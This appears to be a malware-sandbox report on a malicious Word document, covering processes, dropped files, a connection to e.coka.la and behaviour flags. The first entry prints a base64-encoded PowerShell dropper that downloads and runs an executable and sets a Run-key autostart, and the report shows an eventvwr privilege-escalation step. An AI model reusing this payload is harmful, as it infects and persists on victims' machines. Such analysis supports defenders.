3780	PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAARQBxADUAQwB1AFMAdgBmAHYAegB4AF8AawBLAE0ASAA4AEwAQQA1AGcAYgBOAHYAIAAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQANAAoAewANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABRAEgASgBpADcAbwBrAHgAVwB2ADkAcwBHAFIAVQBLAFAAIAAsACAAJAB3AFUAbwBXAGkAbgBHAHgAYgBnAGEAawBLAGcAbQBhAEgAdABsACAAKQA7AHMAdABhAHIAdAAgACQAdwBVAG8AVwBpAG4ARwB4AGIAZwBhAGsASwBnAG0AYQBIAHQAbAAgADsAIAANAAoAfQANAAoAdAByAHkAewANAAoADQAKACQAUwBVAGIARwBrAF8ANAAyAEMAOQA4AE0AQQBlAGsAVwBHAHoAbQBIADkAagA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwATwBUAEMAawBlAG8AbQBGAC4AZQB4AGUAJwA7AA0ACgBFAHEANQBDAHUAUwB2AGYAdgB6AHgAXwBrAEsATQBIADgATABBADUAZwBiAE4AdgAgACcAaAB0AHQAcABzADoALwAvAGUALgBjAG8AawBhAC4AbABhAC8AVQBJAEkAQwBiADYALgBqAHAAZwAnACAAJABTAFUAYgBHAGsAXwA0ADIAQwA5ADgATQBBAGUAawBXAEcAegBtAEgAOQBqADsADQAKACQARABWAFgAZQBlAEUANwBqAG0AaQBwAFQANwBYAFAAVQBPAHAAUAB1AEIANQBDAG4AdwBDAFEAVAAgAD0AJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQArACcAXABPAFQAQwBrAGUAbwBtAEYALgBlAHgAZQAnADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAG0AZQAgACcAMQAwADEAMAAxADAAMQAnACAALQBWAGEAbAB1AGUAIAAkAEQAVgBYAGUAZQBFADcAagBtAGkAcABUADcAWABQAFUATwBwAFAAdQBCADUAQwBuAHcAQwBRAFQAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAJwBTAHQAcgBpAG4AZwAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmD.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
584	"C:\Users\admin\OTCkeomF.exe"	C:\Users\admin\OTCkeomF.exe	—	powershell.exe
User: admin Company: Skype Technologies S.A. Integrity Level: MEDIUM Description: Skype Exit code: 0 Version: 0.0.0.0
2020	"C:\Windows\System32\eventvwr.exe"	C:\Windows\System32\eventvwr.exe	—	OTCkeomF.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1960	"C:\Windows\System32\eventvwr.exe"	C:\Windows\System32\eventvwr.exe		OTCkeomF.exe
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
944	"C:\Users\admin\OTCkeomF.exe"	C:\Users\admin\OTCkeomF.exe	—	eventvwr.exe
User: admin Company: Skype Technologies S.A. Integrity Level: HIGH Description: Skype Version: 0.0.0.0

Add for printing

Total events

1 736

Read events

1 309

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2504	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRA2B4.tmp.cvr		—
		MD5:—	SHA256:—
3780	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM97V8G0LUODY3Y1MKIQ.temp		—
		MD5:—	SHA256:—
2504	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE2623B.jpg		—
		MD5:—	SHA256:—
2504	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoA68D.tmp		—
		MD5:—	SHA256:—
2504	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5933E3AC-49E1-4FBC-904F-56097A0ACAB9}.tmp		—
		MD5:—	SHA256:—
2504	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B8ECBBCE-8AF9-497A-A864-CF3961CCCAED}.tmp		—
		MD5:—	SHA256:—
2504	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{657C6539-4EB4-48EE-A6A3-AEB5131F655C}.tmp		—
		MD5:—	SHA256:—
2504	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml.LNK		lnk
		MD5:530E49D9794D2ACD5327FA4E2961FF26	SHA256:2C1AFEDBFE12D814B9151606F342D4608562042E6F1A025B16E802CCD81DFE65
2504	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:1CEE0E87EB630B6233ECE56C554D36E3	SHA256:70BC06260558C14B898EE2CD5134853783B3F5EF4769F6A8447F33A2F6EFD4D8
2504	WINWORD.EXE	C:\Users\admin\Desktop\~$fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c.xml		pgc
		MD5:F04EC7982B29B2D6B88559FF1B6405BE	SHA256:A0EC686186804C84CC9F613AD28EB1991E992875ED48C1C741164275B580FDCD

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

No HTTP requests

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3780	powershell.exe	163.172.215.76:443	e.coka.la	Online S.a.s.	NL	malicious

DNS requests

Domain	IP	Reputation
e.coka.la	163.172.215.76	malicious

Threats

Found threats are available for the paid subscriptions

1 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

23fa88bbab4ec6ec9125733d367295ace6e828ca670a88e979fcddff1d63a77c

D6A5B472987763190497C24D0DFD74E8

A2228CEA5A43695656F6B5D531D56CB4C963030E

23FA88BBAB4EC6EC9125733D367295ACE6E828CA670A88E979FCDDFF1D63A77C

6144:N/lA5ANOZbg144HsiI1wFwo2ywm7THlYx15Gw4rqYetVp:N/lA5ANORKHsiI1w5dnFcgbrqYetVp

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Unusual execution from Microsoft Office

Starts CMD.EXE for commands execution

Changes the autorun value in the registry

Known privilege escalation attack

Executes PowerShell scripts

Application was dropped or rewritten from another process

SUSPICIOUS

Starts Microsoft Office Application

Executable content was dropped or overwritten

Creates files in the user directory

Modifies the open verb of a shell class

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

XMP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings